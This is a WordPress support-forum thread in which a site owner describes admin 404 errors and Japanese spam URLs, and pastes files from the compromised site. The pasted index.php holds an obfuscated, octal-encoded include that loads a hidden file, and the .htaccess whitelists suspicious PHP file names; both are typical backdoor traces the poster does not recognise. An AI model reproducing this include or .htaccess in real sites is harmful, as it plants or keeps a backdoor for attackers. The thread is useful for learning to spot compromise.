Forum Replies Created

Viewing 14 replies - 1 through 14 (of 14 total)
  • Thread Starter eliteindigo

    (@eliteindigo)

    debug.log

    [03-Oct-2022 02:30:05 UTC] PHP Notice:  Function wp_enqueue_script was called <strong>incorrectly</strong>. Scripts and styles should not be registered or enqueued until the <code>wp_enqueue_scripts</code>, <code>admin_enqueue_scripts</code>, or <code>login_enqueue_scripts</code> hooks. This notice was triggered by the <code>jquery</code> handle. Please see <a href="https://ww.wp.xz.cn/support/article/debugging-in-wordpress/">Debugging in WordPress</a> for more information. (This message was added in version 3.3.0.) in /home/eliteindigo/public_html/wp-includes/functions.php on line 5831
    [03-Oct-2022 02:30:05 UTC] PHP Notice:  Function wp_deregister_script was called <strong>incorrectly</strong>. Scripts and styles should not be registered or enqueued until the <code>wp_enqueue_scripts</code>, <code>admin_enqueue_scripts</code>, or <code>login_enqueue_scripts</code> hooks. This notice was triggered by the <code>jquery</code> handle. Please see <a href="https://ww.wp.xz.cn/support/article/debugging-in-wordpress/">Debugging in WordPress</a> for more information. (This message was added in version 3.3.0.) in /home/eliteindigo/public_html/wp-includes/functions.php on line 5831
    [03-Oct-2022 02:30:05 UTC] PHP Notice:  Function wp_register_script was called <strong>incorrectly</strong>. Scripts and styles should not be registered or enqueued until the <code>wp_enqueue_scripts</code>, <code>admin_enqueue_scripts</code>, or <code>login_enqueue_scripts</code> hooks. This notice was triggered by the <code>jquery</code> handle. Please see <a href="https://ww.wp.xz.cn/support/article/debugging-in-wordpress/">Debugging in WordPress</a> for more information. (This message was added in version 3.3.0.) in /home/eliteindigo/public_html/wp-includes/functions.php on line 5831
    [03-Oct-2022 02:30:05 UTC] PHP Deprecated:  Unparenthesized <code>a ? b : c ? d : e</code> is deprecated. Use either <code>(a ? b : c) ? d : e</code> or <code>a ? b : (c ? d : e)</code> in /home/eliteindigo/public_html/wp-content/plugins/js_composer/include/classes/editors/class-vc-frontend-editor.php on line 644
    [03-Oct-2022 02:30:05 UTC] PHP Deprecated:  The each() function is deprecated. This message will be suppressed on further calls in /home/eliteindigo/public_html/wp-content/plugins/js_composer/include/classes/core/class-vc-mapper.php on line 111
    [03-Oct-2022 02:30:15 UTC] PHP Deprecated:  Methods with the same name as their class will not be constructors in a future version of PHP; RSS_Import has a deprecated constructor in /home/eliteindigo/public_html/wp-content/plugins/rss-importer/rss-importer.php on line 43
    [03-Oct-2022 02:30:15 UTC] PHP Warning:  file_put_contents(/home/eliteindigo/public_html/wp-content/uploads/.htaccess): failed to open stream: Permission denied in /home/eliteindigo/public_html/wp-content/plugins/wp-optimize/includes/class-wp-optimize-htaccess.php on line 135
    [03-Oct-2022 02:30:15 UTC] PHP Warning:  file_put_contents(/home/eliteindigo/public_html/wp-content/uploads/.htaccess): failed to open stream: Permission denied in /home/eliteindigo/public_html/wp-content/plugins/wp-optimize/includes/class-wp-optimize-htaccess.php on line 135

    another weird problem is that google is detecting weird url linked to my website. The queries are filled with japanese letters and google front page indexes my website as some japanese title in the search result even though clicking the link to my website seems to be normal. Could this be a hacking attempt and if so what should I do?

    Thanks again,

    Thread Starter eliteindigo

    (@eliteindigo)

    yes local wp dashboard is giving off same issues as the live wp. After uploading the database, local wp dashboard looks identical to live wp with identical issues.

    Thread Starter eliteindigo

    (@eliteindigo)

    Hi Jorge, sorry for the late response as was quite busy last week.

    Downloaded local wordpress
    -all-in-wp migration in live wp is unable to export wp files
    -manage to get database file through cpanel
    -uploaded database file to clean local wp
    -after uploading the database ONLY( no wp files) the “open site” link brought me to my live webpage working as intended. But wp-admin looks identical to the live version but still giving 404 error
    -I could not export the wp files through all in one but I manually backed up all the wp files through cpanel. So i uploaded the live wp version files into the clean local version. problem persists.
    -now the local wp is identical to the live version I assume? What bothers me is that I named the local wp “elitetest” and that should be the link (elitetest.com/xxx) but pressing open site brings me to my live website “eliteindigo.com/xxx”. Is this suppose to happen or is this some issue with the configurations files that automatically redirect me to the live page.

    -apologies for the long posts. do let me know if I misunderstand certain steps and please do guide me moving forward.

    Thread Starter eliteindigo

    (@eliteindigo)

    Also a weird thing happening is in my Google Search Console under performance/pages, a bunch of strange queries keep appearing as part of my site.

    Urls such as :
    https://eliteindigo.com/module.php?zwxpaghyc56125/
    https://eliteindigo.com/module.php?zwxpcgvic32079/
    https://eliteindigo.com/module.php?zwxpcgvyy20709/

    About 400 of these URL are showing up in google console. Going to the link brings me to a white page.

    Thread Starter eliteindigo

    (@eliteindigo)

    I have managed to download the .gz database file from cpanel.

    Apologies for the dumb question but how do I view the local WP installation? The live WP is accessible with the URL. How do I view the changes made in local WP installation?

    Thread Starter eliteindigo

    (@eliteindigo)

    Yes all in one wordpress migration plugin is installed in wp. I can click on ai1wm on the dashboard but not the plugins page itself. However, when I click on ai1wm I am not able to create an export,import or even backup.

    This error shows up at the top of the page.
    “All-in-One WP Migration is not able to create /home/eliteindigo/public_html/wp-content/ai1wm-backups/.htaccess file. Try to change permissions of the parent folder or send us an email at [email protected] for assistance.”

    Clicking on export or import will show :
    Unable to export
    Unable to start the export. Refresh the page and try again

    To clarify the steps you said:
    -use all in one wordpress migration plugin to backup my site
    -install a clean version of wp from wp website on my d drive.
    -install all in one wordpress migration on to the clean version
    -use the backup to replace the files in the clean version

    Also, how do i see the changes in the local clean files if wp-admin is currently showing me wp files from ftp(cpanel) but the clean version is in my d drive?

    Am I correct in the steps above? Apologies for the dumb question as I am still a student intern.

    Thread Starter eliteindigo

    (@eliteindigo)

    i have deleted all the plugins in the ftp but problem persists.

    Default theme is twenty twentytwo correct? I have changed to to twenty twenty two but problem persists.

    The backup is in my D drive.

    Thread Starter eliteindigo

    (@eliteindigo)

    also just to confirm, I have made the wp intallation backup locally on my d drive. But I should be doing all the changes in the wp in my ftp correct? the backup is only there to replace any files correct?

    Thread Starter eliteindigo

    (@eliteindigo)

    If manage my issue u mean what plugins and themes I currently have installed then

    Theme: Neve
    -can be changed to twentytwentytwo but problem persists

    Plugins
    there are over 20 plugins in my wp-content/plugins file
    -is renaming the plugins file not the same as deleting each plugin 1 by 1 as suggested by the article?
    -the plugins are accessible in wp-admin for some reason, as in it did not bring me to 404 page as expected but any try in using the features lead to errors.
    -For example, I have all-in-one-wp-migration preinstalled before and tried to use this plugin to backup wp but shows error.
    -this is the error showing in wp-admin front dashboard “All-in-One WP Migration is not able to create /home/eliteindigo/public_html/wp-content/ai1wm-backups/.htaccess file. Try to change permissions of the parent folder or send us an email at [email protected] for assistance.”

    htaccess file
    – I remember editing htaccess file to try to solve the issue but after confirming the problem persists, i immediately changed it back to the original without editing .
    -Another big issue i’ve realized, in my ftp there seems to be multiple htaccess files. 1 in public html root, public_html/wp-admin,wp-content,wp-content,plugins,and each plugin. There seem to be alot of htaccess file eventhough the clean wordpress 6.02 that i’ve downloaded from wp did not have htaccess everywhere. Could this be one of the issue? Which file should have the htaccess file?

    Htaccess code:
    <FilesMatch “.(PhP|php5|suspected|phtml|py|exe|php|asp|Php|aspx)$”>
    Order allow,deny
    Deny from all
    </FilesMatch>
    <FilesMatch “^(votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|contents.php|wp-login.php|load.php|themes.php|admin.php|settings.php|bottom.php|years.php|alwso.php|service.php|license.php|module.php)$”>
    Order allow,deny
    Allow from all
    </FilesMatch>
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index.php$ – [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . index.php [L]
    </IfModule>`

    -index.php also shows some strange code that i do not understand.
    There is 1 index.php file in every folder too. Is that suppose to happen?
    Index.php code:
    <?php @include(“\167\160\55\151\156\143\154\165\144\145\163\57\151\155\141\147\145\163\57\154\151\143\145\156\163\145\56\164\170\164”); ?>
    <?php
    define( ‘WP_USE_THEMES’, true );
    require __DIR__ . ‘/wp-blog-header.php’;

    Thread Starter eliteindigo

    (@eliteindigo)

    A little more information on the nature of this issue:

    This issue actually first started with the css being broken in wp-admin. I logged into wp-admin a few days ago but wp did not load css properly. All the blue links are shown but without any css. Clicking the links also lead to 404 error. I have fixed the css issue by allowing scripts but the 404 error persists.

    Any ideas as to what could cause the css to be broken in the first place?

    Thread Starter eliteindigo

    (@eliteindigo)

    ok I’ve installed wordpress locally and then extracted all the public html contents into that local wp.

    Do you have anymore ideas on to solve this issue? I thought the outdated plugins could be an issue but disabling plugins still did not solve the 404 errors. Everytime I try to load pages or add pages or plugins on wp-admin It redirects me to my own site’s 404 page with console stating get wp-admin/update.php not found.

    Thread Starter eliteindigo

    (@eliteindigo)

    I have already backup the all the public html files through Cpanel.

    Any ideas on what I should I do next?
    Should I try reinstalling wordpress? I have already downloaded the wordpress 6.02 file but do I just extract it all in public_html file or delete all the previous files first?

    Thanks again for the help Jorge, really appreciate it.

    Thread Starter eliteindigo

    (@eliteindigo)

    yes I can backup through FTP using Cpanel. I only need to backup the wp files and the php in public_html correct?

    -If so, what should I do next as the themes are unable to be updated(using neve theme right now)
    -plugins can be deactivated by renaming in cpanel but problem persists
    -wordpress is version 6.02 which is latest version according to wordpress website

    Thread Starter eliteindigo

    (@eliteindigo)

    -I cannot even backup as the backup page in wordpress admin is redirecting to 404.
    -Updating plugins page also 404.
    -Themes is accessible and can be changed. But attempts to update the themes only lead to 404 as well.
    -How do I upgrade my WP installation?

Viewing 14 replies - 1 through 14 (of 14 total)